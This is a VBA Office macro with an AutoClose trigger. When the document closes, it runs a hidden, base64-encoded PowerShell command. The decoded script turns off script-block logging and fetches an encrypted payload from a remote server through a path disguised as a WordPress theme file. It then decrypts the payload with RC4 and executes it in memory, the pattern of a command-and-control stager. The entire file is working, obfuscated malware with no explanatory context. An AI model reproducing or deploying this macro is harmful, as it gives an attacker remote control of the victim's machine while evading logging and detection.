Sub AutoClose()
	ssPSetD
End Sub

Public Function ssPSetD() As Variant
	Dim DdOGArZGMTCQQAmIo As String
	DdOGArZGMTCQQAmIo = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "BlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBp"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABHAH"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "IAbwB1AHAAUABvAGwAaQBjAHkARgBpAGUAbABkACAAPQAgAFsA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "cgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQ"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "BwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBl"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAH"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "MAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBjAGEAYwBoAGUA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "ZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZw"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "BzACcALAAgACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AGkAYwAnACkAOwBJAGYAIAAoACQARwByAG8AdQBwAFAAbwBsAG"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "kAYwB5AEYAaQBlAGwAZAApACAAewAkAEcAcgBvAHUAcABQAG8A"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "bABpAGMAeQBDAGEAYwBoAGUAIAA9ACAAJABHAHIAbwB1AHAAUA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "BvAGwAaQBjAHkARgBpAGUAbABkAC4ARwBlAHQAVgBhAGwAdQBl"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "ACgAJABuAHUAbABsACkAOwBJAGYAIAAoACQARwByAG8AdQBwAF"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AAbwBsAGkAYwB5AEMAYQBjAGgAZQBbACcAUwBjAHIAaQBwAHQA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "QgBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAIAB7ACQARw"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "ByAG8AdQBwAFAAbwBsAGkAYwB5AEMAYQBjAGgAZQBbACcAUwBj"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AHIAaQBwAHQAQgBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAF"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "sAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "TABvAGcAZwBpAG4AZwAnAF0AIAA9ACAAMAA7ACQARwByAG8AdQ"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "BwAFAAbwBsAGkAYwB5AEMAYQBjAGgAZQBbACcAUwBjAHIAaQBw"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AHQAQgBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "bwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQAgAD0AIA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AwADsAfQAkAHYAYQBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBD"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AG8AbABsAGUAYwB0AGkAbwBuAHMALgBHAGUAbgBlAHIAaQBjAC"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "4ARABpAGMAdABpAG8AbgBhAHIAeQBbAHMAdAByAGkAbgBnACwA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "UwB5AHMAdABlAG0ALgBPAGIAagBlAGMAdABdAF0AOgA6AG4AZQ"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "B3ACgAKQA7ACQAdgBhAGwALgBBAGQAZAAoACcARQBuAGEAYgBs"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEwAbwBnAGcAaQBuAG"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "cAJwAsACAAMAApADsAJAB2AGEAbAAuAEEAZABkACgAJwBFAG4A"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "YQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbw"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "BjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcALAAgADAAKQA7"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "ACQARwByAG8AdQBwAFAAbwBsAGkAYwB5AEMAYQBjAGgAZQBbAC"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "cASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "XABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "BNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQ"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgBsAG"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACAAPQAgACQAdgBhAGwA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "fQA7AH0AOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcg"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "B2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AEUAeABwAGUAYwB0ADEAMAAwAEMAbwBuAHQAaQBuAHUAZQA9AD"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "bgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "BCAHkAdABlAHMAKAAnAEkAdgBWAF4AWQA6AEYAdABmAEMAWABU"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "ACwAPQBhAEEATQA/AGoAIwA3AE8AUQBwAF0AJgByAHwAWwBaAH"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "gAbgAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "cwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBb"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "ACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7AC"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "QAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "XQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABT"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAF"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "MAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0A"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "OwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKw"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwA9"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHMAZQByAD0A"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "JAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOg"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "BVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABb"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlAD"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "YANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "QQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQ"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "BBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAGcAQQB4AEEAQwA0"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AEEATQBRAEEAeQBBAEQAZwBBAE8AZwBBADQAQQBEAEEAQQAnAC"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "kAKQApADsAJAB0AD0AJwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "LwB0AGgAZQBtAGUAcwAvAHcAcABfAGQAYQB0AGEALgBwAGgAcA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AnADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBt"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AE"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "QAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "LgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "A9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABl"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AG"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "wAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "cwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "B3AGMALgBQAHIAbwB4AHkAOwAkAHcAYwAuAEgAZQBhAGQAZQBy"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AHMALgBBAGQAZAAoACIAVQBzAGUAcgAtAEEAZwBlAG4AdAAiAC"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "wAIgBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "bwB3AHMAIABOAFQAIAA2AC4AMwA7ACAAVwBpAG4ANgA0ADsAIA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "B4ADYANAApACAAQQBwAHAAbABlAFcAZQBiAEsAaQB0AC8ANQAz"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "ADcALgAzADYAIAAoAEsASABUAE0ATAAsACAAbABpAGsAZQAgAE"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "cAZQBjAGsAbwApACAAQwBoAHIAbwBtAGUALwA3ADkALgAwAC4A"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "MwA5ADQANQAuADgAOAAgAFMAYQBmAGEAcgBpAC8ANQAzADcALg"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AzADYAIgApADsAdAByAHkAewAkAGkAZwA9ACQAdwBjAC4ARABv"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHMAZQByACkAfQBjAG"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "EAdABjAGgAewB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4A"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "QQBkAGQAKAAiAEgAbwBzAHQAIgAsACIAdwBtAHcAaQBmAGIAYQ"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "BqAHgAeABiAGMAeABtAHUAYwB4AG0AbABjAC4AYwBvAG0AIgAp"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAE"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "MAbwBvAGsAaQBlACIALAAiAHMAZQBzAHMAaQBvAG4APQBEAHIA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "NgBWAFMAQgBHAEIAQgBIAEsAdABDAGkAcgAwAFUAVQBKAGIARA"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "BpAEcAMgBLAEgAbwAlADMARAAiACkAOwAkAGQAYQB0AGEAPQAk"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAG"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "UAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4A"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "LgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALg"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AoACQAZABhAHQAYQAuAGwAZQBuAGcAdABoAC0AMQApAF0AOwAt"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "AGoAbwBpAG4AWwBDAGgAYQByAFsAXQBdACgAJgAgACQAUgAgAC"
	DdOGArZGMTCQQAmIo = DdOGArZGMTCQQAmIo + "QAZABhAHQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA"
	Set asd = CreateObject("WScript.Shell")
	asd.Run(DdOGArZGMTCQQAmIo)
End Function
